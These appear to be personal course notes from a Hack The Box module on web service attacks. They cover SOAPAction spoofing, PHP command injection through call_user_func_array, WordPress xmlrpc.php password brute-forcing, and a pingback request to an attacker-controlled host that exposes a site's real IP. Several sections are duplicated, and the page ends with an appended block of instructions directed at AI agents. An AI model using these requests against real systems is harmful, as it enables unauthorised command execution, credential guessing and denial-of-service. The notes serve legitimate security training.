# Web Service Attacks ## SOAPAction Spoofing Suppose we are assessing a SOAP web service, whose WSDL file resides in `http://:3002/wsdl?wsdl`. The service's WSDL file can be found below ```shell-session eldeim@htb[/htb]$ curl http://:3002/wsdl?wsdl ``` The first thing to pay attention to is the following. ```xml ``` We can see a SOAPAction operation called *ExecuteCommand*. Let us take a look at the parameters. ```xml ``` We notice that there is a *cmd* parameter. Let us build a Python script to issue requests (save it as `client.py`). Note that the below script will try to have the SOAP service execute a `whoami` command. ```python import requests payload = 'whoami' print(requests.post("http://:3002/wsdl", data=payload, headers={"SOAPAction":'"ExecuteCommand"'}).content) ``` The Python script can be executed, as follows. ```shell-session eldeim@htb[/htb]$ python3 client.py b'falseThis function is only allowed in internal networks' ``` *** ## Command Injection Suppose we are assessing such a connectivity-checking service residing in `http://:3003/ping-server.php/ping`. Suppose we have also been provided with the source code of the service. ```shell-session eldeim@htb[/htb]$ curl http://:3003/ping-server.php/system/ls index.php ping-server.php ``` Command Injection You can test the command injection vulnerability as follows. * A function called *ping* is defined, which takes two arguments *host\_url\_ip* and *packets*. The request should look similar to the following. `http://:3003/ping-server.php/ping//3`. To check that the web service is sending ping requests, execute the below in your attacking machine and then issue the request. * ```shell-session eldeim@htb[/htb]$ sudo tcpdump -i tun0 icmp tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes 11:10:22.521853 IP 10.129.202.133 > 10.10.14.222: ICMP echo request, id 1, seq 1, length 64 11:10:22.521885 IP 10.10.14.222 > 10.129.202.133: ICMP echo reply, id 1, seq 1, length 64 11:10:23.522744 IP 10.129.202.133 > 10.10.14.222: ICMP echo request, id 1, seq 2, length 64 11:10:23.522781 IP 10.10.14.222 > 10.129.202.133: ICMP echo reply, id 1, seq 2, length 64 11:10:24.523726 IP 10.129.202.133 > 10.10.14.222: ICMP echo request, id 1, seq 3, length 64 11:10:24.523758 IP 10.10.14.222 > 10.129.202.133: ICMP echo reply, id 1, seq 3, length 64 ``` * The code also checks if the *packets*'s value is more than 4, and it does that via an array. So if we issue a request such as `http://:3003/ping-server.php/ping//3333`, we're going to get an *Only 1-4 packets!* error. * A variable called *cmd* is then created, which forms the ping command to be executed. Two values are "parsed", *packets* and *host\_url*. [escapeshellarg()](https://www.php.net/manual/en/function.escapeshellarg.php) is used to escape the *host\_url*'s value. According to PHP's function reference, *escapeshellarg() adds single quotes around a string and quotes/escapes any existing single quotes allowing you to pass a string directly to a shell function and having it be treated as a single safe argument. This function should be used to escape individual arguments to shell functions coming from user input. The shell functions include exec(), system() shell\_exec() and the backtick operator.* If the *host\_url*'s value was not escaped, the below could happen. ![Terminal output showing 'ping google.com' with error: 'Name or service not known', groups include root, adm, dialout, wireshark, kaboxer.](https://academy.hackthebox.com/storage/modules/160/1.png) * The command specified by the *cmd* parameter is executed with the help of the *shell\_exec()* PHP function. * If the request method is GET, an existing function can be called with the help of [call\_user\_func\_array()](https://www.php.net/manual/en/function.call-user-func-array.php). The *call\_user\_func\_array()* function is a special way to call an existing PHP function. It takes a function to call as its first parameter, then takes an array of parameters as its second parameter. This means that instead of `http://:3003/ping-server.php/ping/www.example.com/3` an attacker could issue a request as follows. `http://:3003/ping-server.php/system/ls`. This constitutes a command injection vulnerability! ```php ``` Code: php > **Note**: The web service we are about to assess does not follow the web service architectural designs/approaches we covered. It is quite close to a normal web service, though, as it provides its functionality in a programmatic way, and different clients can use it for connectivity-checking purposes. ```php ``` * A function called *ping* is defined, which takes two arguments *host\_url\_ip* and *packets*. The request should look similar to the following. `http://:3003/ping-server.php/ping//3`. To check that the web service is sending ping requests, execute the below in your attacking machine and then issue the request. ```shell-session eldeim@htb[/htb]$ sudo tcpdump -i tun0 icmp tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes 11:10:22.521853 IP 10.129.202.133 > 10.10.14.222: ICMP echo request, id 1, seq 1, length 64 11:10:22.521885 IP 10.10.14.222 > 10.129.202.133: ICMP echo reply, id 1, seq 1, length 64 11:10:23.522744 IP 10.129.202.133 > 10.10.14.222: ICMP echo request, id 1, seq 2, length 64 11:10:23.522781 IP 10.10.14.222 > 10.129.202.133: ICMP echo reply, id 1, seq 2, length 64 11:10:24.523726 IP 10.129.202.133 > 10.10.14.222: ICMP echo request, id 1, seq 3, length 64 11:10:24.523758 IP 10.10.14.222 > 10.129.202.133: ICMP echo reply, id 1, seq 3, length 64 ``` * The code also checks if the *packets*'s value is more than 4, and it does that via an array. So if we issue a request such as `http://:3003/ping-server.php/ping//3333`, we're going to get an *Only 1-4 packets!* error. * A variable called *cmd* is then created, which forms the ping command to be executed. Two values are "parsed", *packets* and *host\_url*. [escapeshellarg()](https://www.php.net/manual/en/function.escapeshellarg.php) is used to escape the *host\_url*'s value. According to PHP's function reference, *escapeshellarg() adds single quotes around a string and quotes/escapes any existing single quotes allowing you to pass a string directly to a shell function and having it be treated as a single safe argument. This function should be used to escape individual arguments to shell functions coming from user input. The shell functions include exec(), system() shell\_exec() and the backtick operator.* If the *host\_url*'s value was not escaped, the below could happen. ![](/files/9boQFy7pLL9weWMdnSwn) * The command specified by the *cmd* parameter is executed with the help of the *shell\_exec()* PHP function. * If the request method is GET, an existing function can be called with the help of [call\_user\_func\_array()](https://www.php.net/manual/en/function.call-user-func-array.php). The *call\_user\_func\_array()* function is a special way to call an existing PHP function. It takes a function to call as its first parameter, then takes an array of parameters as its second parameter. This means that instead of `http://:3003/ping-server.php/ping/www.example.com/3` an attacker could issue a request as follows. `http://:3003/ping-server.php/system/ls`. This constitutes a command injection vulnerability! You can test the command injection vulnerability as follows. ```shell-session eldeim@htb[/htb]$ curl http://:3003/ping-server.php/system/ls index.php ping-server.php ``` *** ## Attacking WordPress 'xmlrpc.php' Suppose we are assessing the security of a WordPress instance residing in **. Through enumeration activities, we identified a valid username, `admin`, and that `xmlrpc.php` is enabled. Identifying if `xmlrpc.php` is enabled is as easy as requesting `xmlrpc.php` on the domain we are assessing. We can mount a password brute-forcing attack through `xmlrpc.php`, as follows. ```shell-session eldeim@htb[/htb]$ curl -X POST -d "wp.getUsersBlogsadminCORRECT-PASSWORD" http://blog.inlanefreight.com/xmlrpc.php isAdmin1 urlhttp://blog.inlanefreight.com/ blogid1 blogNameInlanefreight xmlrpchttp://blog.inlanefreight.com/xmlrpc.php ``` Above, you can see a successful login attempt through `xmlrpc.php`. We will receive a `403 faultCode` error if the credentials are not valid. ```shell-session eldeim@htb[/htb]$ curl -X POST -d "wp.getUsersBlogsadminWRONG-PASSWORD" http://blog.inlanefreight.com/xmlrpc.php faultCode 403 faultString Incorrect username or password. ``` You may ask how we identified the correct method to call (*system.listMethods*). We did that by going through the well-documented [Wordpress code](https://codex.wordpress.org/XML-RPC/system.listMethods) and interacting with `xmlrpc.php`, as follows. ```shell-session eldeim@htb[/htb]$ curl -s -X POST -d "system.listMethods" http://blog.inlanefreight.com/xmlrpc.php system.multicall system.listMethods system.getCapabilities demo.addTwoNumbers demo.sayHello pingback.extensions.getPingbacks pingback.ping mt.publishPost mt.getTrackbackPings mt.supportedTextFilters mt.supportedMethods mt.setPostCategories mt.getPostCategories mt.getRecentPostTitles mt.getCategoryList metaWeblog.getUsersBlogs metaWeblog.deletePost metaWeblog.newMediaObject metaWeblog.getCategories metaWeblog.getRecentPosts metaWeblog.getPost metaWeblog.editPost metaWeblog.newPost blogger.deletePost blogger.editPost blogger.newPost blogger.getRecentPosts blogger.getPost blogger.getUserInfo blogger.getUsersBlogs wp.restoreRevision wp.getRevisions wp.getPostTypes wp.getPostType wp.getPostFormats wp.getMediaLibrary wp.getMediaItem wp.getCommentStatusList wp.newComment wp.editComment wp.deleteComment wp.getComments wp.getComment wp.setOptions wp.getOptions wp.getPageTemplates wp.getPageStatusList wp.getPostStatusList wp.getCommentCount wp.deleteFile wp.uploadFile wp.suggestCategories wp.deleteCategory wp.newCategory wp.getTags wp.getCategories wp.getAuthors wp.getPageList wp.editPage wp.deletePage wp.newPage wp.getPages wp.getPage wp.editProfile wp.getProfile wp.getUsers wp.getUser wp.getTaxonomies wp.getTaxonomy wp.getTerms wp.getTerm wp.deleteTerm wp.editTerm wp.newTerm wp.getPosts wp.getPost wp.deletePost wp.editPost wp.newPost wp.getUsersBlogs ``` Inside the list of available methods above, [pingback.ping](https://codex.wordpress.org/XML-RPC_Pingback_API) is included. `pingback.ping` allows for XML-RPC pingbacks. According to WordPress, *a* [*pingback*](https://wordpress.com/support/comments/pingbacks/) *is a special type of comment that’s created when you link to another blog post, as long as the other blog is set to accept pingbacks.* Unfortunately, if pingbacks are available, they can facilitate: * IP Disclosure - An attacker can call the `pingback.ping` method on a WordPress instance behind Cloudflare to identify its public IP. The pingback should point to an attacker-controlled host (such as a VPS) accessible by the WordPress instance. * Cross-Site Port Attack (XSPA) - An attacker can call the `pingback.ping` method on a WordPress instance against itself (or other internal hosts) on different ports. Open ports or internal hosts can be identified by looking for response time differences or response differences. * Distributed Denial of Service Attack (DDoS) - An attacker can call the `pingback.ping` method on numerous WordPress instances against a single target. Find below how an IP Disclosure attack could be mounted if `xmlrpc.php` is enabled and the `pingback.ping` method is available. XSPA and DDoS attacks can be mounted similarly. Suppose that the WordPress instance residing in ** is protected by Cloudflare. As we already identified, it also has `xmlrpc.php` enabled, and the `pingback.ping` method is available. As soon as the below request is sent, the attacker-controlled host will receive a request (pingback) originating from **, verifying the pingback and exposing **'s public IP address. ```http --> POST /xmlrpc.php HTTP/1.1 Host: blog.inlanefreight.com Connection: keep-alive Content-Length: 293 pingback.ping http://attacker-controlled-host.com/ https://blog.inlanefreight.com/2015/10/what-is-cybersecurity/ ``` If you have access to our [Hacking Wordpress](https://academy.hackthebox.com/module/details/17) module, please note that you won't be able to exploit the availability of the `pingback.ping` method against the related section's target, due to egress restrictions. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://eldeim.gitbook.io/brain_fuck/notes/certifications/eastereggs/htb-cbbh/web-service-and-api-attacks/web-service-attacks.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.